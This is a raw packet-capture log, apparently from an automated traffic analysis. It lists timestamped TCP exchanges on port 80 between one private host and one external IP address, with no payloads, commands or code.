Oct 29, 2021 20:51:06.948687077 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:07.295978069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:07.296178102 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:07.869216919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:07.869385004 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:09.004976034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:09.005136013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:11.421478033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:11.421636105 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.634393930 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.671972036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.671997070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672015905 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672034979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672105074 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.672158003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.672557116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672580004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672595978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672611952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672632933 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.672665119 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.672899008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672911882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.672955990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.713844061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.713870049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.713886023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.713901997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.713994026 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.714049101 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.714910030 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.714930058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.714946032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.714962006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715003014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.715035915 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.715284109 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715302944 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715331078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715368986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.715384007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715428114 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.715621948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715641022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715658903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715675116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715698957 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.715733051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715739965 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.715754986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715771914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715787888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.715804100 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.715832949 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750264883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750292063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750310898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750328064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750344992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750361919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750377893 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750394106 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750408888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750425100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750427961 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750441074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750497103 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750528097 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750545025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750560045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750576019 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750576019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750592947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750642061 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750700951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750721931 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750773907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750790119 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750798941 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750819921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750838041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750838995 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750885010 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.750910044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750929117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750945091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750962019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.750993013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.751034975 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.753719091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753741980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753758907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753774881 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753829002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753844976 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753849983 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.753876925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753885031 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.753894091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753910065 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753926992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753937006 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.753943920 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753959894 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753967047 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.753977060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.753993034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.754004002 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.754029036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809231997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809258938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809276104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809292078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809308052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809324980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809340000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809355974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809362888 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809372902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809390068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809406996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809422970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809439898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809441090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809458017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809473991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809487104 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809525013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809729099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809746981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809762955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809777021 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809778929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809797049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809812069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809812069 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809828997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809844971 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809856892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809860945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809878111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809885979 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809912920 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809923887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809962988 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.809967041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.809987068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810003042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810018063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810024023 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810035944 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810051918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810060978 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810069084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810086012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810096979 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810101032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810118914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810120106 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810137033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810153961 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810161114 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810169935 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810187101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810201883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810211897 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810219049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810235023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810245037 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810250998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810271978 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810281992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810291052 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810302973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810319901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810334921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.810343027 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.810379028 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.811511993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.811533928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.811548948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.811583996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.811592102 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.811624050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.812151909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.812170982 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.812210083 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.812257051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.812293053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.812334061 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.813002110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.813038111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.813056946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.813082933 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842048883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842072010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842088938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842106104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842122078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842137098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842153072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842166901 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842170000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842187881 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842204094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842231989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842264891 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842329979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842348099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842374086 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842382908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842423916 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842425108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842668056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842704058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842711926 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842730045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842746973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842767954 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842777967 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842818975 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.842823982 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842854977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842873096 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:12.842894077 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:12.949114084 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:13.309371948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:13.449183941 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:13.853267908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:13.853404045 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.023782969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.055948019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.055978060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.055985928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.055999041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056011915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056029081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056041002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056102037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056107044 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.056129932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056133032 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.056149006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056164980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056180000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056188107 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.056197882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056204081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.056230068 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.056263924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056301117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056312084 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.056349993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.056394100 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.115698099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115725994 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115742922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115757942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115782022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115799904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115814924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115830898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115848064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115864992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115864038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.115901947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.115906954 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.115916014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.115925074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115942001 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115959883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115974903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115989923 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.115999937 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116005898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116022110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116030931 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116038084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116056919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116058111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116074085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116091013 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116106033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116110086 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116144896 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116152048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116177082 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116193056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116209984 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116225958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116251945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116262913 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116275072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116292953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116292953 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116308928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116324902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116326094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116343021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.116363049 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.116395950 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.149401903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149430990 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149447918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149465084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149480104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149524927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149542093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149559021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149575949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149602890 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.149646044 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.149815083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149833918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149849892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149867058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149876118 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.149907112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.149925947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149944067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149960995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149980068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.149985075 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150018930 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150194883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150213957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150249958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150252104 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150268078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150285959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150301933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150314093 CEST	49865	80	192.168.2.4	91.219.236.97
